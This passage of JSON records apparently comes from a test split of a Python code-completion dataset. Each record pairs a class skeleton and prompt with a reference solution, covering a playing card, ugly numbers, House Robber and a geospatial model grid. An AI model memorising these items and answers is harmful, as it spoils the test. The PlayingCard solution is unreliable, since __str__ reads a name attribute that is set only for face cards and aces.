Attributes: value -- the card's value, an integer. suit -- the card's suit, a string", "class_name": "PlayingCard", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass PlayingCard:\n \"\"\"Class -- PlayingCard Represents a playing card. Attributes: value -- the card's value, an integer. suit -- the card's suit, a string\"\"\"\n\n def __init__(self, value, suit):\n \"\"\"Constructor -- creates a new instance of PlayingCard Parameters: self -- the current PlayingCard object value -- the card's value, an integer suit -- the card's suit, a string\"\"\"\n <|body_0|>\n\n def set_name(self):\n \"\"\"Method -- set_name Helper method to set the name of special cards. Parameter: self -- The current PlayingCard object Returns: Nothing. Sets the name attribute if applicable.\"\"\"\n <|body_1|>\n\n def __str__(self):\n \"\"\"Method -- __str__ Creates a string representation of the PlayingCard Parameter: self -- The current PlayingCard object Returns: A string representation of the PlayingCard.\"\"\"\n <|body_2|>\n\n def __eq__(self, other):\n \"\"\"Method -- __eq__ Checks if two objects are equal Parameters: self -- The current PlayingCard object other -- An object to compare self to. Returns: True if the two objects are equal, False otherwise.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.value = value\n self.suit = suit\n self.set_name()\n<|end_body_0|>\n\n<|body_start_1|>\n NAMES = {1: 'Ace', 11: 'Jack', 12: 'Queen', 13: 'King'}\n if self.value in NAMES:\n self.name = NAMES[self.value]\n<|end_body_1|>\n\n<|body_start_2|>\n if self.name is not None:\n return '{} of {}'.format(self.name, self.suit)\n return '{} of {}'.format(self.value, self.suit)\n<|end_body_2|>\n\n<|body_start_3|>\n if type(self) != type(other):\n return False\n return self.value == other.value and self.suit == other.suit\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000003", "length_bytes": 2418, "license_type": "no_license", "methods": [{"docstring": "Constructor -- creates a new instance of PlayingCard Parameters: self -- the current PlayingCard object value -- the card's value, an integer suit -- the card's suit, a string", "name": "__init__", "signature": "def __init__(self, value, suit)"}, {"docstring": "Method -- set_name Helper method to set the name of special cards. Parameter: self -- The current PlayingCard object Returns: Nothing. Sets the name attribute if applicable.", "name": "set_name", "signature": "def set_name(self)"}, {"docstring": "Method -- __str__ Creates a string representation of the PlayingCard Parameter: self -- The current PlayingCard object Returns: A string representation of the PlayingCard.", "name": "__str__", "signature": "def __str__(self)"}, {"docstring": "Method -- __eq__ Checks if two objects are equal Parameters: self -- The current PlayingCard object other -- An object to compare self to. Returns: True if the two objects are equal, False otherwise.", "name": "__eq__", "signature": "def __eq__(self, other)"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_train_004873", "prompt": "Implement the Python class `PlayingCard` described below.\n\nClass description:\nClass -- PlayingCard Represents a playing card. Attributes: value -- the card's value, an integer. suit -- the card's suit, a string\n\nMethod signatures and docstrings:\n- def __init__(self, value, suit): Constructor -- creates a new instance of PlayingCard Parameters: self -- the current PlayingCard object value -- the card's value, an integer suit -- the card's suit, a string\n- def set_name(self): Method -- set_name Helper method to set the name of special cards. Parameter: self -- The current PlayingCard object Returns: Nothing. Sets the name attribute if applicable.\n- def __str__(self): Method -- __str__ Creates a string representation of the PlayingCard Parameter: self -- The current PlayingCard object Returns: A string representation of the PlayingCard.\n- def __eq__(self, other): Method -- __eq__ Checks if two objects are equal Parameters: self -- The current PlayingCard object other -- An object to compare self to. Returns: True if the two objects are equal, False otherwise.", "prompted_full_text": "Implement the Python class `PlayingCard` described below.\n\nClass description:\nClass -- PlayingCard Represents a playing card. Attributes: value -- the card's value, an integer. suit -- the card's suit, a string\n\nMethod signatures and docstrings:\n- def __init__(self, value, suit): Constructor -- creates a new instance of PlayingCard Parameters: self -- the current PlayingCard object value -- the card's value, an integer suit -- the card's suit, a string\n- def set_name(self): Method -- set_name Helper method to set the name of special cards. Parameter: self -- The current PlayingCard object Returns: Nothing. Sets the name attribute if applicable.\n- def __str__(self): Method -- __str__ Creates a string representation of the PlayingCard Parameter: self -- The current PlayingCard object Returns: A string representation of the PlayingCard.\n- def __eq__(self, other): Method -- __eq__ Checks if two objects are equal Parameters: self -- The current PlayingCard object other -- An object to compare self to. Returns: True if the two objects are equal, False otherwise.\n\n<|skeleton|>\nclass PlayingCard:\n \"\"\"Class -- PlayingCard Represents a playing card. Attributes: value -- the card's value, an integer. suit -- the card's suit, a string\"\"\"\n\n def __init__(self, value, suit):\n \"\"\"Constructor -- creates a new instance of PlayingCard Parameters: self -- the current PlayingCard object value -- the card's value, an integer suit -- the card's suit, a string\"\"\"\n <|body_0|>\n\n def set_name(self):\n \"\"\"Method -- set_name Helper method to set the name of special cards. Parameter: self -- The current PlayingCard object Returns: Nothing. Sets the name attribute if applicable.\"\"\"\n <|body_1|>\n\n def __str__(self):\n \"\"\"Method -- __str__ Creates a string representation of the PlayingCard Parameter: self -- The current PlayingCard object Returns: A string representation of the PlayingCard.\"\"\"\n <|body_2|>\n\n def __eq__(self, other):\n \"\"\"Method -- __eq__ Checks if two objects are equal Parameters: self -- The current PlayingCard object other -- An object to compare self to. Returns: True if the two objects are equal, False otherwise.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.value = value\n self.suit = suit\n self.set_name()\n<|end_body_0|>\n\n<|body_start_1|>\n NAMES = {1: 'Ace', 11: 'Jack', 12: 'Queen', 13: 'King'}\n if self.value in NAMES:\n self.name = NAMES[self.value]\n<|end_body_1|>\n\n<|body_start_2|>\n if self.name is not None:\n return '{} of {}'.format(self.name, self.suit)\n return '{} of {}'.format(self.value, self.suit)\n<|end_body_2|>\n\n<|body_start_3|>\n if type(self) != type(other):\n return False\n return self.value == other.value and self.suit == other.suit\n<|end_body_3|>\n", "revision_id": "b9281f5f959e0268b75baa2c2b1262712da3780f", "skeleton": "<|skeleton|>\nclass PlayingCard:\n \"\"\"Class -- PlayingCard Represents a playing card. Attributes: value -- the card's value, an integer. suit -- the card's suit, a string\"\"\"\n\n def __init__(self, value, suit):\n \"\"\"Constructor -- creates a new instance of PlayingCard Parameters: self -- the current PlayingCard object value -- the card's value, an integer suit -- the card's suit, a string\"\"\"\n <|body_0|>\n\n def set_name(self):\n \"\"\"Method -- set_name Helper method to set the name of special cards. Parameter: self -- The current PlayingCard object Returns: Nothing. Sets the name attribute if applicable.\"\"\"\n <|body_1|>\n\n def __str__(self):\n \"\"\"Method -- __str__ Creates a string representation of the PlayingCard Parameter: self -- The current PlayingCard object Returns: A string representation of the PlayingCard.\"\"\"\n <|body_2|>\n\n def __eq__(self, other):\n \"\"\"Method -- __eq__ Checks if two objects are equal Parameters: self -- The current PlayingCard object other -- An object to compare self to. Returns: True if the two objects are equal, False otherwise.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class PlayingCard:\n \"\"\"Class -- PlayingCard Represents a playing card. Attributes: value -- the card's value, an integer. suit -- the card's suit, a string\"\"\"\n\n def __init__(self, value, suit):\n \"\"\"Constructor -- creates a new instance of PlayingCard Parameters: self -- the current PlayingCard object value -- the card's value, an integer suit -- the card's suit, a string\"\"\"\n self.value = value\n self.suit = suit\n self.set_name()\n\n def set_name(self):\n \"\"\"Method -- set_name Helper method to set the name of special cards. Parameter: self -- The current PlayingCard object Returns: Nothing. Sets the name attribute if applicable.\"\"\"\n NAMES = {1: 'Ace', 11: 'Jack', 12: 'Queen', 13: 'King'}\n if self.value in NAMES:\n self.name = NAMES[self.value]\n\n def __str__(self):\n \"\"\"Method -- __str__ Creates a string representation of the PlayingCard Parameter: self -- The current PlayingCard object Returns: A string representation of the PlayingCard.\"\"\"\n if self.name is not None:\n return '{} of {}'.format(self.name, self.suit)\n return '{} of {}'.format(self.value, self.suit)\n\n def __eq__(self, other):\n \"\"\"Method -- __eq__ Checks if two objects are equal Parameters: self -- The current PlayingCard object other -- An object to compare self to. Returns: True if the two objects are equal, False otherwise.\"\"\"\n if type(self) != type(other):\n return False\n return self.value == other.value and self.suit == other.suit\n", "source": "the_stack_v2_python_sparse", "source_path": "in_class_excercise/Lecture 10/cardgame/playingcard.py", "source_repo": "arcPenguinj/CS5001-Intensive-Foundations-of-CS", "split": "test", "star_events_count": 0} {"blob_id": "2dc0f74851d24e31290e96be60ce04183a3df2b8", "bodies": ["heap = []\nheapq.heappush(heap, 1)\nfor _ in range(n):\n ugly = heapq.heappop(heap)\n if ugly % 2 == 0:\n heapq.heappush(heap, ugly * 2)\n elif ugly % 3 == 0:\n heapq.heappush(heap, ugly * 2)\n heapq.heappush(heap, ugly * 3)\n else:\n heapq.heappush(heap, ugly * 2)\n heapq.heappush(heap, ugly * 3)\n heapq.heappush(heap, ugly * 5)\nreturn ugly", "records = set()\nrecords |= set([1, 2, 3, 5])\ncount = 0\nnth_num = 0\nnum = 0\nwhile count < n:\n nth_num += 1\n num = nth_num\n for d in (2, 3, 5):\n while num % d == 0:\n n_new = num // d\n if n_new in records:\n num = 1\n break\n num = n_new\n if num == 1:\n count += 1\n records.add(nth_num)\nreturn nth_num"], "bodies_text": "<|body_start_0|>\n heap = []\n heapq.heappush(heap, 1)\n for _ in range(n):\n ugly = heapq.heappop(heap)\n if ugly % 2 == 0:\n heapq.heappush(heap, ugly * 2)\n elif ugly % 3 == 0:\n heapq.heappush(heap, ugly * 2)\n heapq.heappush(heap, ugly * 3)\n else:\n heapq.heappush(heap, ugly * 2)\n heapq.heappush(heap, ugly * 3)\n heapq.heappush(heap, ugly * 5)\n return ugly\n<|end_body_0|>\n\n<|body_start_1|>\n records = set()\n records |= set([1, 2, 3, 5])\n count = 0\n nth_num = 0\n num = 0\n while count < n:\n nth_num += 1\n num = nth_num\n for d in (2, 3, 5):\n while num % d == 0:\n n_new = num // d\n if n_new in records:\n num = 1\n break\n num = n_new\n if num == 1:\n count += 1\n records.add(nth_num)\n return nth_num\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def nthUglyNumber(self, n):\n \"\"\":type n: int :rtype: int\"\"\"\n <|body_0|>\n\n def nthUglyNumber_TLE(self, n):\n \"\"\":type n: int :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n heap = []\n heapq.heappush(heap, 1)\n for _ in range(n):\n ugly = heapq.heappop(heap)\n if ugly % 2 == 0:\n heapq.heappush(heap, ugly * 2)\n elif ugly % 3 == 0:\n heapq.heappush(heap, ugly * 2)\n heapq.heappush(heap, ugly * 3)\n else:\n heapq.heappush(heap, ugly * 2)\n heapq.heappush(heap, ugly * 3)\n heapq.heappush(heap, ugly * 5)\n return ugly\n<|end_body_0|>\n\n<|body_start_1|>\n records = set()\n records |= set([1, 2, 3, 5])\n count = 0\n nth_num = 0\n num = 0\n while count < n:\n nth_num += 1\n num = nth_num\n for d in (2, 3, 5):\n while num % d == 0:\n n_new = num // d\n if n_new in records:\n num = 1\n break\n num = n_new\n if num == 1:\n count += 1\n records.add(nth_num)\n return nth_num\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000004", "length_bytes": 2226, "license_type": "no_license", "methods": [{"docstring": ":type n: int :rtype: int", "name": "nthUglyNumber", "signature": "def nthUglyNumber(self, n)"}, {"docstring": ":type n: int :rtype: int", "name": "nthUglyNumber_TLE", "signature": "def nthUglyNumber_TLE(self, n)"}], "n_methods": 2, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def nthUglyNumber(self, n): :type n: int :rtype: int\n- def nthUglyNumber_TLE(self, n): :type n: int :rtype: int", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def nthUglyNumber(self, n): :type n: int :rtype: int\n- def nthUglyNumber_TLE(self, n): :type n: int :rtype: int\n\n<|skeleton|>\nclass Solution:\n\n def nthUglyNumber(self, n):\n \"\"\":type n: int :rtype: int\"\"\"\n <|body_0|>\n\n def nthUglyNumber_TLE(self, n):\n \"\"\":type n: int :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n heap = []\n heapq.heappush(heap, 1)\n for _ in range(n):\n ugly = heapq.heappop(heap)\n if ugly % 2 == 0:\n heapq.heappush(heap, ugly * 2)\n elif ugly % 3 == 0:\n heapq.heappush(heap, ugly * 2)\n heapq.heappush(heap, ugly * 3)\n else:\n heapq.heappush(heap, ugly * 2)\n heapq.heappush(heap, ugly * 3)\n heapq.heappush(heap, ugly * 5)\n return ugly\n<|end_body_0|>\n\n<|body_start_1|>\n records = set()\n records |= set([1, 2, 3, 5])\n count = 0\n nth_num = 0\n num = 0\n while count < n:\n nth_num += 1\n num = nth_num\n for d in (2, 3, 5):\n while num % d == 0:\n n_new = num // d\n if n_new in records:\n num = 1\n break\n num = n_new\n if num == 1:\n count += 1\n records.add(nth_num)\n return nth_num\n<|end_body_1|>\n", "revision_id": "e60ba45fe2f2e5e3b3abfecec3db76f5ce1fde59", "skeleton": "<|skeleton|>\nclass Solution:\n\n def nthUglyNumber(self, n):\n \"\"\":type n: int :rtype: int\"\"\"\n <|body_0|>\n\n def nthUglyNumber_TLE(self, n):\n \"\"\":type n: int :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def nthUglyNumber(self, n):\n \"\"\":type n: int :rtype: int\"\"\"\n heap = []\n heapq.heappush(heap, 1)\n for _ in range(n):\n ugly = heapq.heappop(heap)\n if ugly % 2 == 0:\n heapq.heappush(heap, ugly * 2)\n elif ugly % 3 == 0:\n heapq.heappush(heap, ugly * 2)\n heapq.heappush(heap, ugly * 3)\n else:\n heapq.heappush(heap, ugly * 2)\n heapq.heappush(heap, ugly * 3)\n heapq.heappush(heap, ugly * 5)\n return ugly\n\n def nthUglyNumber_TLE(self, n):\n \"\"\":type n: int :rtype: int\"\"\"\n records = set()\n records |= set([1, 2, 3, 5])\n count = 0\n nth_num = 0\n num = 0\n while count < n:\n nth_num += 1\n num = nth_num\n for d in (2, 3, 5):\n while num % d == 0:\n n_new = num // d\n if n_new in records:\n num = 1\n break\n num = n_new\n if num == 1:\n count += 1\n records.add(nth_num)\n return nth_num\n", "source": "the_stack_v2_python_sparse", "source_path": "src/lt_264.py", "source_repo": "oxhead/CodingYourWay", "split": "test", "star_events_count": 0} {"blob_id": "1e12709f54a7ef504a524019d0c1f7dd86608e31", "bodies": ["if len(nums) == 1:\n return nums[0]\n\ndef my_rob(nums):\n if not nums:\n return 0\n if len(nums) == 1:\n return nums[0]\n memo = [0] * len(nums)\n memo[0] = nums[0]\n memo[1] = max(memo[0], nums[1])\n for i in range(2, len(nums)):\n memo[i] = max(memo[i - 2] + nums[i], memo[i - 1])\n return memo[len(nums) - 1]\nreturn max(my_rob(nums[1:]), my_rob(nums[:-1]))", "if len(nums) == 1:\n return nums[0]\n\ndef my_rob(nums):\n if not nums:\n return 0\n if len(nums) == 1:\n return nums[0]\n prev1 = prev2 = 0\n for num in nums:\n temp = prev1\n prev1 = max(prev1, prev2 + num)\n prev2 = temp\n return prev1\nreturn max(my_rob(nums[1:]), my_rob(nums[:-1]))"], "bodies_text": "<|body_start_0|>\n if len(nums) == 1:\n return nums[0]\n\n def my_rob(nums):\n if not nums:\n return 0\n if len(nums) == 1:\n return nums[0]\n memo = [0] * len(nums)\n memo[0] = nums[0]\n memo[1] = max(memo[0], nums[1])\n for i in range(2, len(nums)):\n memo[i] = max(memo[i - 2] + nums[i], memo[i - 1])\n return memo[len(nums) - 1]\n return max(my_rob(nums[1:]), my_rob(nums[:-1]))\n<|end_body_0|>\n\n<|body_start_1|>\n if len(nums) == 1:\n return nums[0]\n\n def my_rob(nums):\n if not nums:\n return 0\n if len(nums) == 1:\n return nums[0]\n prev1 = prev2 = 0\n for num in nums:\n temp = prev1\n prev1 = max(prev1, prev2 + num)\n prev2 = temp\n return prev1\n return max(my_rob(nums[1:]), my_rob(nums[:-1]))\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def rob(self, nums):\n \"\"\":type nums: List[int] :rtype: int\"\"\"\n <|body_0|>\n\n def rob_2variables(self, nums):\n \"\"\"time O(n) space O(1) :type nums: List[int] :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if len(nums) == 1:\n return nums[0]\n\n def my_rob(nums):\n if not nums:\n return 0\n if len(nums) == 1:\n return nums[0]\n memo = [0] * len(nums)\n memo[0] = nums[0]\n memo[1] = max(memo[0], nums[1])\n for i in range(2, len(nums)):\n memo[i] = max(memo[i - 2] + nums[i], memo[i - 1])\n return memo[len(nums) - 1]\n return max(my_rob(nums[1:]), my_rob(nums[:-1]))\n<|end_body_0|>\n\n<|body_start_1|>\n if len(nums) == 1:\n return nums[0]\n\n def my_rob(nums):\n if not nums:\n return 0\n if len(nums) == 1:\n return nums[0]\n prev1 = prev2 = 0\n for num in nums:\n temp = prev1\n prev1 = max(prev1, prev2 + num)\n prev2 = temp\n return prev1\n return max(my_rob(nums[1:]), my_rob(nums[:-1]))\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000005", "length_bytes": 1316, "license_type": "no_license", "methods": [{"docstring": ":type nums: List[int] :rtype: int", "name": "rob", "signature": "def rob(self, nums)"}, {"docstring": "time O(n) space O(1) :type nums: List[int] :rtype: int", "name": "rob_2variables", "signature": "def rob_2variables(self, nums)"}], "n_methods": 2, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def rob(self, nums): :type nums: List[int] :rtype: int\n- def rob_2variables(self, nums): time O(n) space O(1) :type nums: List[int] :rtype: int", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def rob(self, nums): :type nums: List[int] :rtype: int\n- def rob_2variables(self, nums): time O(n) space O(1) :type nums: List[int] :rtype: int\n\n<|skeleton|>\nclass Solution:\n\n def rob(self, nums):\n \"\"\":type nums: List[int] :rtype: int\"\"\"\n <|body_0|>\n\n def rob_2variables(self, nums):\n \"\"\"time O(n) space O(1) :type nums: List[int] :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if len(nums) == 1:\n return nums[0]\n\n def my_rob(nums):\n if not nums:\n return 0\n if len(nums) == 1:\n return nums[0]\n memo = [0] * len(nums)\n memo[0] = nums[0]\n memo[1] = max(memo[0], nums[1])\n for i in range(2, len(nums)):\n memo[i] = max(memo[i - 2] + nums[i], memo[i - 1])\n return memo[len(nums) - 1]\n return max(my_rob(nums[1:]), my_rob(nums[:-1]))\n<|end_body_0|>\n\n<|body_start_1|>\n if len(nums) == 1:\n return nums[0]\n\n def my_rob(nums):\n if not nums:\n return 0\n if len(nums) == 1:\n return nums[0]\n prev1 = prev2 = 0\n for num in nums:\n temp = prev1\n prev1 = max(prev1, prev2 + num)\n prev2 = temp\n return prev1\n return max(my_rob(nums[1:]), my_rob(nums[:-1]))\n<|end_body_1|>\n", "revision_id": "85f71621c54f6b0029f3a2746f022f89dd7419d9", "skeleton": "<|skeleton|>\nclass Solution:\n\n def rob(self, nums):\n \"\"\":type nums: List[int] :rtype: int\"\"\"\n <|body_0|>\n\n def rob_2variables(self, nums):\n \"\"\"time O(n) space O(1) :type nums: List[int] :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def rob(self, nums):\n \"\"\":type nums: List[int] :rtype: int\"\"\"\n if len(nums) == 1:\n return nums[0]\n\n def my_rob(nums):\n if not nums:\n return 0\n if len(nums) == 1:\n return nums[0]\n memo = [0] * len(nums)\n memo[0] = nums[0]\n memo[1] = max(memo[0], nums[1])\n for i in range(2, len(nums)):\n memo[i] = max(memo[i - 2] + nums[i], memo[i - 1])\n return memo[len(nums) - 1]\n return max(my_rob(nums[1:]), my_rob(nums[:-1]))\n\n def rob_2variables(self, nums):\n \"\"\"time O(n) space O(1) :type nums: List[int] :rtype: int\"\"\"\n if len(nums) == 1:\n return nums[0]\n\n def my_rob(nums):\n if not nums:\n return 0\n if len(nums) == 1:\n return nums[0]\n prev1 = prev2 = 0\n for num in nums:\n temp = prev1\n prev1 = max(prev1, prev2 + num)\n prev2 = temp\n return prev1\n return max(my_rob(nums[1:]), my_rob(nums[:-1]))\n", "source": "the_stack_v2_python_sparse", "source_path": "LeetCode/DynamicProgramming/213_house_robber_ii.py", "source_repo": "XyK0907/for_work", "split": "test", "star_events_count": 0} {"blob_id": "11e6fe728794e8cb4910e5c8b8e0a769d5ee1951", "bodies": ["transform = self.transform\nif transform.a < 0 or transform.e > 0:\n raise NotImplementedError\nx_min = transform.xoff\nx_max = x_min + self.cols * self.resolution\ny_max = transform.yoff\ny_min = y_max - self.rows * self.resolution\nx_range, y_range = rasterio.transform.xy(self.transform, [0, self.rows - 1], [0, self.cols - 1])\nxs = np.linspace(x_range[0], x_range[1], self.cols)\nys = np.linspace(y_range[0], y_range[1], self.rows)\nX, Y = np.meshgrid(xs, ys)\ncenter_x = xs.mean()\ncenter_y = ys.mean()\ncenter_lon, center_lat = transform_coords(center_x, center_y, self.crs, constants.CRS_WGS84)\nself.x_min = x_min\nself.x_max = x_max\nself.y_min = y_min\nself.y_max = y_max\nself.xs = xs\nself.ys = ys\nself.X = X\nself.Y = Y\nself.all_points = np.column_stack((X.flat, Y.flat))\nself.center_lon = center_lon\nself.center_lat = center_lat\nself.prepare_roi_coordinates()", "if 'roi' not in self:\n self.roi = np.ones((self.rows, self.cols), dtype=bool)\nroi_xs = self.X[self.roi]\nroi_ys = self.Y[self.roi]\nself.roi_points = np.column_stack((roi_xs, roi_ys))\nself.roi_idxs = np.array(np.where(self.roi)).T\nself.roi_idxs_flat = np.where(self.roi.flat)[0]"], "bodies_text": "<|body_start_0|>\n transform = self.transform\n if transform.a < 0 or transform.e > 0:\n raise NotImplementedError\n x_min = transform.xoff\n x_max = x_min + self.cols * self.resolution\n y_max = transform.yoff\n y_min = y_max - self.rows * self.resolution\n x_range, y_range = rasterio.transform.xy(self.transform, [0, self.rows - 1], [0, self.cols - 1])\n xs = np.linspace(x_range[0], x_range[1], self.cols)\n ys = np.linspace(y_range[0], y_range[1], self.rows)\n X, Y = np.meshgrid(xs, ys)\n center_x = xs.mean()\n center_y = ys.mean()\n center_lon, center_lat = transform_coords(center_x, center_y, self.crs, constants.CRS_WGS84)\n self.x_min = x_min\n self.x_max = x_max\n self.y_min = y_min\n self.y_max = y_max\n self.xs = xs\n self.ys = ys\n self.X = X\n self.Y = Y\n self.all_points = np.column_stack((X.flat, Y.flat))\n self.center_lon = center_lon\n self.center_lat = center_lat\n self.prepare_roi_coordinates()\n<|end_body_0|>\n\n<|body_start_1|>\n if 'roi' not in self:\n self.roi = np.ones((self.rows, self.cols), dtype=bool)\n roi_xs = self.X[self.roi]\n roi_ys = self.Y[self.roi]\n self.roi_points = np.column_stack((roi_xs, roi_ys))\n self.roi_idxs = np.array(np.where(self.roi)).T\n self.roi_idxs_flat = np.where(self.roi.flat)[0]\n<|end_body_1|>\n", "class_docstring": "Container for storing model grid related variables.", "class_name": "ModelGrid", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ModelGrid:\n \"\"\"Container for storing model grid related variables.\"\"\"\n\n def prepare_coordinates(self):\n \"\"\"Prepare a range of variables related to the grid coordinates: - xs, ys: 1d-arrays containing the x and y coordinates in the grid CRS. - X, Y, 2d-arrays containing the x and y coordinates for each grid point. - all_points: (N, 2)-array containing (x, y) coordinates of all grid points. - roi_points: (N, 2)-array containing (x, y) coordinates of all ROI points. - roi_idxs: (N, 2)-array containing (row, col) indexes of all ROI points. - roi_idxs_flat: 1d-array containing the flattened (1d) indexes of all ROI points\"\"\"\n <|body_0|>\n\n def prepare_roi_coordinates(self):\n \"\"\"Update the roi_points and roi_idxs variables using the ROI field.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n transform = self.transform\n if transform.a < 0 or transform.e > 0:\n raise NotImplementedError\n x_min = transform.xoff\n x_max = x_min + self.cols * self.resolution\n y_max = transform.yoff\n y_min = y_max - self.rows * self.resolution\n x_range, y_range = rasterio.transform.xy(self.transform, [0, self.rows - 1], [0, self.cols - 1])\n xs = np.linspace(x_range[0], x_range[1], self.cols)\n ys = np.linspace(y_range[0], y_range[1], self.rows)\n X, Y = np.meshgrid(xs, ys)\n center_x = xs.mean()\n center_y = ys.mean()\n center_lon, center_lat = transform_coords(center_x, center_y, self.crs, constants.CRS_WGS84)\n self.x_min = x_min\n self.x_max = x_max\n self.y_min = y_min\n self.y_max = y_max\n self.xs = xs\n self.ys = ys\n self.X = X\n self.Y = Y\n self.all_points = np.column_stack((X.flat, Y.flat))\n self.center_lon = center_lon\n self.center_lat = center_lat\n self.prepare_roi_coordinates()\n<|end_body_0|>\n\n<|body_start_1|>\n if 'roi' not in self:\n self.roi = np.ones((self.rows, self.cols), dtype=bool)\n roi_xs = self.X[self.roi]\n roi_ys = self.Y[self.roi]\n self.roi_points = np.column_stack((roi_xs, roi_ys))\n self.roi_idxs = np.array(np.where(self.roi)).T\n self.roi_idxs_flat = np.where(self.roi.flat)[0]\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000006", "length_bytes": 6138, "license_type": "permissive", "methods": [{"docstring": "Prepare a range of variables related to the grid coordinates: - xs, ys: 1d-arrays containing the x and y coordinates in the grid CRS. - X, Y, 2d-arrays containing the x and y coordinates for each grid point. - all_points: (N, 2)-array containing (x, y) coordinates of all grid points. - roi_points: (N, 2)-array containing (x, y) coordinates of all ROI points. - roi_idxs: (N, 2)-array containing (row, col) indexes of all ROI points. - roi_idxs_flat: 1d-array containing the flattened (1d) indexes of all ROI points", "name": "prepare_coordinates", "signature": "def prepare_coordinates(self)"}, {"docstring": "Update the roi_points and roi_idxs variables using the ROI field.", "name": "prepare_roi_coordinates", "signature": "def prepare_roi_coordinates(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_test_000128", "prompt": "Implement the Python class `ModelGrid` described below.\n\nClass description:\nContainer for storing model grid related variables.\n\nMethod signatures and docstrings:\n- def prepare_coordinates(self): Prepare a range of variables related to the grid coordinates: - xs, ys: 1d-arrays containing the x and y coordinates in the grid CRS. - X, Y, 2d-arrays containing the x and y coordinates for each grid point. - all_points: (N, 2)-array containing (x, y) coordinates of all grid points. - roi_points: (N, 2)-array containing (x, y) coordinates of all ROI points. - roi_idxs: (N, 2)-array containing (row, col) indexes of all ROI points. - roi_idxs_flat: 1d-array containing the flattened (1d) indexes of all ROI points\n- def prepare_roi_coordinates(self): Update the roi_points and roi_idxs variables using the ROI field.", "prompted_full_text": "Implement the Python class `ModelGrid` described below.\n\nClass description:\nContainer for storing model grid related variables.\n\nMethod signatures and docstrings:\n- def prepare_coordinates(self): Prepare a range of variables related to the grid coordinates: - xs, ys: 1d-arrays containing the x and y coordinates in the grid CRS. - X, Y, 2d-arrays containing the x and y coordinates for each grid point. - all_points: (N, 2)-array containing (x, y) coordinates of all grid points. - roi_points: (N, 2)-array containing (x, y) coordinates of all ROI points. - roi_idxs: (N, 2)-array containing (row, col) indexes of all ROI points. - roi_idxs_flat: 1d-array containing the flattened (1d) indexes of all ROI points\n- def prepare_roi_coordinates(self): Update the roi_points and roi_idxs variables using the ROI field.\n\n<|skeleton|>\nclass ModelGrid:\n \"\"\"Container for storing model grid related variables.\"\"\"\n\n def prepare_coordinates(self):\n \"\"\"Prepare a range of variables related to the grid coordinates: - xs, ys: 1d-arrays containing the x and y coordinates in the grid CRS. - X, Y, 2d-arrays containing the x and y coordinates for each grid point. - all_points: (N, 2)-array containing (x, y) coordinates of all grid points. - roi_points: (N, 2)-array containing (x, y) coordinates of all ROI points. - roi_idxs: (N, 2)-array containing (row, col) indexes of all ROI points. - roi_idxs_flat: 1d-array containing the flattened (1d) indexes of all ROI points\"\"\"\n <|body_0|>\n\n def prepare_roi_coordinates(self):\n \"\"\"Update the roi_points and roi_idxs variables using the ROI field.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n transform = self.transform\n if transform.a < 0 or transform.e > 0:\n raise NotImplementedError\n x_min = transform.xoff\n x_max = x_min + self.cols * self.resolution\n y_max = transform.yoff\n y_min = y_max - self.rows * self.resolution\n x_range, y_range = rasterio.transform.xy(self.transform, [0, self.rows - 1], [0, self.cols - 1])\n xs = np.linspace(x_range[0], x_range[1], self.cols)\n ys = np.linspace(y_range[0], y_range[1], self.rows)\n X, Y = np.meshgrid(xs, ys)\n center_x = xs.mean()\n center_y = ys.mean()\n center_lon, center_lat = transform_coords(center_x, center_y, self.crs, constants.CRS_WGS84)\n self.x_min = x_min\n self.x_max = x_max\n self.y_min = y_min\n self.y_max = y_max\n self.xs = xs\n self.ys = ys\n self.X = X\n self.Y = Y\n self.all_points = np.column_stack((X.flat, Y.flat))\n self.center_lon = center_lon\n self.center_lat = center_lat\n self.prepare_roi_coordinates()\n<|end_body_0|>\n\n<|body_start_1|>\n if 'roi' not in self:\n self.roi = np.ones((self.rows, self.cols), dtype=bool)\n roi_xs = self.X[self.roi]\n roi_ys = self.Y[self.roi]\n self.roi_points = 